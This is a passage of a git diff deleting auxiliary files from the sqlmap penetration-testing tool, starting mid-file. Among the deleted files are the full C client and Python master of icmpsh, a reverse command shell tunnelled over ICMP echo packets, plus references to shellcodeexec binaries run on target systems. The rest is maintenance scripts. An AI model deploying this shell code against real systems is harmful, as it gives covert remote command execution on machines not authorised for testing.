GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - lib = LoadLibraryA("ICMP.DLL"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - printf("failed to load functions (%u)", GetLastError()); - - return 0; -} -int main(int argc, char **argv) -{ - int opt; - char *target; - unsigned int delay, timeout; - unsigned int ip_addr; - HANDLE pipe_read, pipe_write; - HANDLE icmp_chan; - unsigned char *in_buf, *out_buf; - unsigned int in_buf_size, out_buf_size; - DWORD rs; - int blanks, max_blanks; - PROCESS_INFORMATION pi; - int status; - unsigned int max_data_size; - struct hostent *he; - - - // set defaults - target = 0; - timeout = DEFAULT_TIMEOUT; - delay = DEFAULT_DELAY; - max_blanks = DEFAULT_MAX_BLANKS; - max_data_size = DEFAULT_MAX_DATA_SIZE; - - status = STATUS_OK; - if (!load_deps()) { - printf("failed to load ICMP library\n"); - return -1; - } - - // parse command line options - for (opt = 1; opt < argc; opt++) { - if (argv[opt][0] == '-') { - switch(argv[opt][1]) { - case 'h': - usage(*argv); - return 0; - case 't': - if (opt + 1 < argc) { - target = argv[opt + 1]; - } - break; - case 'd': - if (opt + 1 < argc) { - delay = atol(argv[opt + 1]); - } - break; - case 'o': - if (opt + 1 < argc) { - timeout = atol(argv[opt + 1]); - } - break; - case 'r': - status = STATUS_SINGLE; - break; - case 'b': - if (opt + 1 < argc) { - max_blanks = atol(argv[opt + 1]); - } - break; - case 's': - if (opt + 1 < argc) { - max_data_size = atol(argv[opt + 1]); - } - break; - default: - printf("unrecognized option -%c\n", argv[1][0]); - usage(*argv); - return -1; - } - } - } - - if (!target) { - printf("you need to specify a host with -t. 
Try -h for more options\n"); - return -1; - } - ip_addr = to_ip(target); - - // don't spawn a shell if we're only sending a single test request - if (status != STATUS_SINGLE) { - status = spawn_shell(&pi, &pipe_read, &pipe_write); - } - - // create icmp channel - create_icmp_channel(&icmp_chan); - if (icmp_chan == INVALID_HANDLE_VALUE) { - printf("unable to create ICMP file: %u\n", GetLastError()); - return -1; - } - - // allocate transfer buffers - in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - if (!in_buf || !out_buf) { - printf("failed to allocate memory for transfer buffers\n"); - return -1; - } - memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - - // sending/receiving loop - blanks = 0; - do { - - switch(status) { - case STATUS_SINGLE: - // reply with a static string - out_buf_size = sprintf(out_buf, "Test1234\n"); - break; - case STATUS_PROCESS_NOT_CREATED: - // reply with error message - out_buf_size = sprintf(out_buf, "Process was not created\n"); - break; - default: - // read data from process via pipe - out_buf_size = 0; - if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { - if (out_buf_size > 0) { - out_buf_size = 0; - rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); - if (!rs && GetLastError() != ERROR_IO_PENDING) { - out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); - } - } - } else { - out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); - } - break; - } - - // send request/receive response - if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { - if (status == STATUS_OK) { - // write data from response back into pipe - WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); - } - blanks = 0; - } else { - // no reply received 
or error occured - blanks++; - } - - // wait between requests - Sleep(delay); - - } while (status == STATUS_OK && blanks < max_blanks); - - if (status == STATUS_OK) { - TerminateProcess(pi.hProcess, 0); - } - - return 0; -} - diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ deleted file mode 100644 index a1eb995c..00000000 Binary files a/extra/icmpsh/icmpsh.exe_ and /dev/null differ diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py deleted file mode 100644 index 6e96952b..00000000 --- a/extra/icmpsh/icmpsh_m.py +++ /dev/null @@ -1,138 +0,0 @@ -#!/usr/bin/env python -# -# icmpsh - simple icmp command shell (port of icmpsh-m.pl written in -# Perl by Nico Leidecker ) -# -# Copyright (c) 2010, Bernardo Damele A. G. -# -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . 
- -import os -import select -import socket -import subprocess -import sys - -def setNonBlocking(fd): - """ - Make a file descriptor non-blocking - """ - - import fcntl - - flags = fcntl.fcntl(fd, fcntl.F_GETFL) - flags = flags | os.O_NONBLOCK - fcntl.fcntl(fd, fcntl.F_SETFL, flags) - -def main(src, dst): - if subprocess.mswindows: - sys.stderr.write('icmpsh master can only run on Posix systems\n') - sys.exit(255) - - try: - from impacket import ImpactDecoder - from impacket import ImpactPacket - except ImportError: - sys.stderr.write('You need to install Python Impacket library first\n') - sys.exit(255) - - # Make standard input a non-blocking file - stdin_fd = sys.stdin.fileno() - setNonBlocking(stdin_fd) - - # Open one socket for ICMP protocol - # A special option is set on the socket so that IP headers are included - # with the returned data - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) - except socket.error: - sys.stderr.write('You need to run icmpsh master with administrator privileges\n') - sys.exit(1) - - sock.setblocking(0) - sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) - - # Create a new IP packet and set its source and destination addresses - ip = ImpactPacket.IP() - ip.set_ip_src(src) - ip.set_ip_dst(dst) - - # Create a new ICMP packet of type ECHO REPLY - icmp = ImpactPacket.ICMP() - icmp.set_icmp_type(icmp.ICMP_ECHOREPLY) - - # Instantiate an IP packets decoder - decoder = ImpactDecoder.IPDecoder() - - while True: - cmd = '' - - # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: - buff = sock.recv(4096) - - if 0 == len(buff): - # Socket remotely closed - sock.close() - sys.exit(0) - - # Packet received; decode and display it - ippacket = decoder.decode(buff) - icmppacket = ippacket.child() - - # If the packet matches, report it to the user - if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): - # Get identifier and sequence 
number - ident = icmppacket.get_icmp_id() - seq_id = icmppacket.get_icmp_seq() - data = icmppacket.get_data_as_string() - - if len(data) > 0: - sys.stdout.write(data) - - # Parse command from standard input - try: - cmd = sys.stdin.readline() - except: - pass - - if cmd == 'exit\n': - return - - # Set sequence number and identifier - icmp.set_icmp_id(ident) - icmp.set_icmp_seq(seq_id) - - # Include the command as data inside the ICMP packet - icmp.contains(ImpactPacket.Data(cmd)) - - # Calculate its checksum - icmp.set_icmp_cksum(0) - icmp.auto_checksum = 1 - - # Have the IP packet contain the ICMP packet (along with its payload) - ip.contains(icmp) - - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) - -if __name__ == '__main__': - if len(sys.argv) < 3: - msg = 'missing mandatory options. Execute as root:\n' - msg += './icmpsh-m.py \n' - sys.stderr.write(msg) - sys.exit(1) - - main(sys.argv[1], sys.argv[2]) diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 730a986c..00000000 --- a/extra/mssqlsig/update.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. 
Please run the script from its parent directory" % MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = 
servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt deleted file mode 100644 index 717800aa..00000000 --- a/extra/runcmd/README.txt +++ /dev/null @@ -1,3 +0,0 @@ -Files in this folder can be used to compile auxiliary program that can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. 
diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/windows/README.txt deleted file mode 100644 index b75508d5..00000000 --- a/extra/runcmd/windows/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Compile only the Release version because the Runtime library option -(Project Properties -> Configuration Properties -> C/C++ -> Code -Generation) is set to "Multi-threaded (/MT)", which statically links -everything into executable and doesn't compile Debug version at all. diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/windows/runcmd.sln deleted file mode 100644 index 0770582d..00000000 --- a/extra/runcmd/windows/runcmd.sln +++ /dev/null @@ -1,20 +0,0 @@ - -Microsoft Visual Studio Solution File, Format Version 9.00 -# Visual Studio 2005 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/windows/runcmd/runcmd.cpp deleted file mode 100644 index ab40a0c2..00000000 --- a/extra/runcmd/windows/runcmd/runcmd.cpp +++ /dev/null @@ -1,46 +0,0 @@ -/* - runcmd - a program for running command prompt commands - Copyright (C) 2010 Miroslav Stampar - email: miroslav.stampar@gmail.com - - This library is free software; you can redistribute it and/or - modify it under the terms of the 
GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include "stdafx.h" -#include - -using namespace std; -int main(int argc, char* argv[]) -{ - FILE *fp; - string cmd; - - for( int count = 1; count < argc; count++ ) - cmd += " " + string(argv[count]); - - fp = _popen(cmd.c_str(), "r"); - - if (fp != NULL) { - char buffer[BUFSIZ]; - - while (fgets(buffer, sizeof buffer, fp) != NULL) - fputs(buffer, stdout); - } - - return 0; -} diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/windows/runcmd/runcmd.vcproj deleted file mode 100644 index 928c7160..00000000 --- a/extra/runcmd/windows/runcmd/runcmd.vcproj +++ /dev/null @@ -1,225 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/windows/runcmd/stdafx.cpp deleted file mode 100644 index f5e34953..00000000 --- a/extra/runcmd/windows/runcmd/stdafx.cpp +++ /dev/null @@ -1,8 +0,0 @@ -// stdafx.cpp : source file that includes just the standard includes -// runcmd.pch will be the pre-compiled header -// stdafx.obj will contain the pre-compiled type information - -#include "stdafx.h" - -// TODO: reference any additional headers you need in STDAFX.H -// and not in this file diff --git a/extra/runcmd/windows/runcmd/stdafx.h 
b/extra/runcmd/windows/runcmd/stdafx.h deleted file mode 100644 index bdabbfb4..00000000 --- a/extra/runcmd/windows/runcmd/stdafx.h +++ /dev/null @@ -1,17 +0,0 @@ -// stdafx.h : include file for standard system include files, -// or project specific include files that are used frequently, but -// are changed infrequently -// - -#pragma once - -#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. -#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. -#endif - -#include -#include - - - -// TODO: reference additional headers your program requires here diff --git a/extra/safe2bin/README.txt b/extra/safe2bin/README.txt deleted file mode 100644 index 06400d6e..00000000 --- a/extra/safe2bin/README.txt +++ /dev/null @@ -1,17 +0,0 @@ -To use safe2bin.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./safe2bin.py -i output.txt -o output.txt.bin - -This will create an binary decoded file output.txt.bin. For example, -if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will -be decoded to: " test 234 -newline" - -If you skip the output file name, general rule is that the binary -file names are suffixed with the string '.bin'. 
So, that means that -the upper example can also be written in the following form: - -$ python ./safe2bin.py -i output.txt diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/extra/safe2bin/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py deleted file mode 100644 index f5a14725..00000000 --- a/extra/safe2bin/safe2bin.py +++ /dev/null @@ -1,130 +0,0 @@ -#!/usr/bin/env python - -""" -safe2bin.py - Simple safe(hex) to binary format converter - -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import re -import string -import os -import sys - -from optparse import OptionError -from optparse import OptionParser - -# Regex used for recognition of hex encoded characters -HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" - -# Raw chars that will be safe encoded to their slash (\) representations (e.g. 
newline to \n) -SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" - -# Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) - -# Prefix used for hex encoded values -HEX_ENCODED_PREFIX = r"\x" - -# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding) -HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__" - -# String used for temporary marking of slash characters -SLASH_MARKER = "__SLASH__" - -def safecharencode(value): - """ - Returns safe representation of a given basestring value - - >>> safecharencode(u'test123') - u'test123' - >>> safecharencode(u'test\x01\x02\xff') - u'test\\01\\02\\03\\ff' - """ - - retVal = value - - if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): - retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER) - retVal = retVal.replace('\\', SLASH_MARKER) - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS: - retVal = retVal.replace(char, repr(char).strip('\'')) - - retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) - - retVal = retVal.replace(SLASH_MARKER, "\\\\") - retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX) - elif isinstance(value, list): - for i in xrange(len(value)): - retVal[i] = safecharencode(value[i]) - - return retVal - -def safechardecode(value, binary=False): - """ - Reverse function to safecharencode - """ - - retVal = value - if isinstance(value, basestring): - retVal = retVal.replace('\\\\', SLASH_MARKER) - - while True: - match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) - else: - break - - for char in 
SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: - retVal = retVal.replace(repr(char).strip('\''), char) - - retVal = retVal.replace(SLASH_MARKER, '\\') - - if binary: - if isinstance(retVal, unicode): - retVal = retVal.encode("utf8") - - elif isinstance(value, (list, tuple)): - for i in xrange(len(value)): - retVal[i] = safechardecode(value[i]) - - return retVal - -def main(): - usage = '%s -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile - sys.exit(1) - - f = open(args.inputFile, 'r') - data = f.read() - f.close() - - if not args.outputFile: - args.outputFile = args.inputFile + '.bin' - - f = open(args.outputFile, 'wb') - f.write(safechardecode(data)) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/shellcodeexec/README.txt b/extra/shellcodeexec/README.txt deleted file mode 100644 index ad8fe349..00000000 --- a/extra/shellcodeexec/README.txt +++ /dev/null @@ -1,4 +0,0 @@ -Binary files in this folder are data files used by sqlmap on the target -system, but not executed on the system running sqlmap. They are licensed -under the terms of the GNU Lesser General Public License and their source -code is available on https://github.com/inquisb/shellcodeexec. 
diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ deleted file mode 100644 index ec62f230..00000000 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and /dev/null differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ deleted file mode 100644 index 10e8fea3..00000000 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and /dev/null differ diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ deleted file mode 100644 index c4204cce..00000000 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and /dev/null differ diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh deleted file mode 100755 index dc91d6b1..00000000 --- a/extra/shutils/blanks.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Removes trailing spaces from blank lines inside project files -find . 
-type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py deleted file mode 100644 index a5562cec..00000000 --- a/extra/shutils/duplicates.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Removes duplicate entries in wordlist like files - -import sys - -if len(sys.argv) > 0: - items = list() - - with open(sys.argv[1], 'r') as f: - for item in f.readlines(): - item = item.strip() - try: - str.encode(item) - if item in items: - if item: - print item - else: - items.append(item) - except: - pass - - with open(sys.argv[1], 'w+') as f: - f.writelines("\n".join(items)) diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 7abe562b..00000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . 
-wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/precommit-hook b/extra/shutils/precommit-hook deleted file mode 100644 index 4896f531..00000000 --- a/extra/shutils/precommit-hook +++ /dev/null @@ -1,22 +0,0 @@ -#!/bin/bash - -SETTINGS="../../lib/core/settings.py" - -declare -x SCRIPTPATH="${0}" - -FULLPATH=${SCRIPTPATH%/*}/$SETTINGS - -if [ -f $FULLPATH ] -then - LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"'); - declare -a LINE; - INCREMENTED=$(python -c "import re, sys; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); print sys.argv[1].replace(version, '.'.join(_))" "$LINE") - if [ -n "$INCREMENTED" ] - then - sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH - echo "Updated ${INCREMENTED} in ${FULLPATH}"; - else - echo "Something went wrong in VERSION increment" - exit 1 - fi -fi; diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh deleted file mode 100755 index 815b98e7..00000000 --- a/extra/shutils/pyflakes.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes) -find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \; diff --git a/extra/shutils/pylint.py b/extra/shutils/pylint.py deleted file mode 100644 index 440f638a..00000000 --- a/extra/shutils/pylint.py +++ /dev/null @@ -1,50 +0,0 @@ -#! 
/usr/bin/env python - -# Runs pylint on all python scripts found in a directory tree -# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html - -import os -import re -import sys - -total = 0.0 -count = 0 - -__RATING__ = False - -def check(module): - global total, count - - if module[-3:] == ".py": - - print "CHECKING ", module - pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r') - for line in pout: - if re.match("E....:.", line): - print line - if __RATING__ and "Your code has been rated at" in line: - print line - score = re.findall("\d.\d\d", line)[0] - total += float(score) - count += 1 - -if __name__ == "__main__": - try: - print sys.argv - BASE_DIRECTORY = sys.argv[1] - except IndexError: - print "no directory specified, defaulting to current working directory" - BASE_DIRECTORY = os.getcwd() - - print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY - for root, dirs, files in os.walk(BASE_DIRECTORY): - if any(_ in root for _ in ("extra", "thirdparty")): - continue - for name in files: - filepath = os.path.join(root, name) - check(filepath) - - if __RATING__: - print "==" * 50 - print "%d modules found" % count - print "AVERAGE SCORE = %.02f" % (total / count) diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py deleted file mode 100644 index d5379405..00000000 --- a/extra/shutils/regressiontest.py +++ /dev/null @@ -1,165 +0,0 @@ -#!/usr/bin/env python - -# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -import codecs -import inspect -import os -import re -import smtplib -import subprocess -import sys -import time -import traceback - -from email.mime.multipart import MIMEMultipart -from email.mime.text import MIMEText - -sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe())))) - -from lib.core.revision import getRevisionNumber - -START_TIME = time.strftime("%H:%M:%S 
%d-%m-%Y", time.gmtime()) -SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() - -SMTP_SERVER = "127.0.0.1" -SMTP_PORT = 25 -SMTP_TIMEOUT = 30 -FROM = "regressiontest@sqlmap.org" -#TO = "dev@sqlmap.org" -TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) -TARGET = "debian" - -def prepare_email(content): - global FROM - global TO - global SUBJECT - - msg = MIMEMultipart() - msg["Subject"] = SUBJECT - msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) - - msg.attach(MIMEText(content)) - - return msg - -def send_email(msg): - global SMTP_SERVER - global SMTP_PORT - global SMTP_TIMEOUT - - try: - s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT) - s.sendmail(FROM, TO, msg.as_string()) - s.quit() - # Catch all for SMTP exceptions - except smtplib.SMTPException, e: - print "Failure to send email: %s" % str(e) - -def failure_email(msg): - msg = prepare_email(msg) - send_email(msg) - sys.exit(1) - -def main(): - global SUBJECT - - content = "" - test_counts = [] - attachments = {} - - updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = updateproc.communicate() - - if stderr: - failure_email("Update of sqlmap failed with error:\n\n%s" % stderr) - - regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) - stdout, stderr = regressionproc.communicate() - - if stderr: - failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - - failed_tests = re.findall("running live test case: (.+?) 
\((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) - - for failed_test in failed_tests: - title = failed_test[0] - test_count = int(failed_test[1]) - parse = failed_test[3] if failed_test[3] else None - output_folder = failed_test[4] - traceback = False if failed_test[5] == "False" else bool(failed_test[5]) - detected = False if failed_test[6] else True - - test_counts.append(test_count) - - console_output_file = os.path.join(output_folder, "console_output") - log_file = os.path.join(output_folder, TARGET, "log") - traceback_file = os.path.join(output_folder, "traceback") - - if os.path.exists(console_output_file): - console_output_fd = codecs.open(console_output_file, "rb", "utf8") - console_output = console_output_fd.read() - console_output_fd.close() - attachments[test_count] = str(console_output) - - if os.path.exists(log_file): - log_fd = codecs.open(log_file, "rb", "utf8") - log = log_fd.read() - log_fd.close() - - if os.path.exists(traceback_file): - traceback_fd = codecs.open(traceback_file, "rb", "utf8") - traceback = traceback_fd.read() - traceback_fd.close() - - content += "Failed test case '%s' (#%d)" % (title, test_count) - - if parse: - content += " at parsing: %s:\n\n" % parse - content += "### Log file:\n\n" - content += 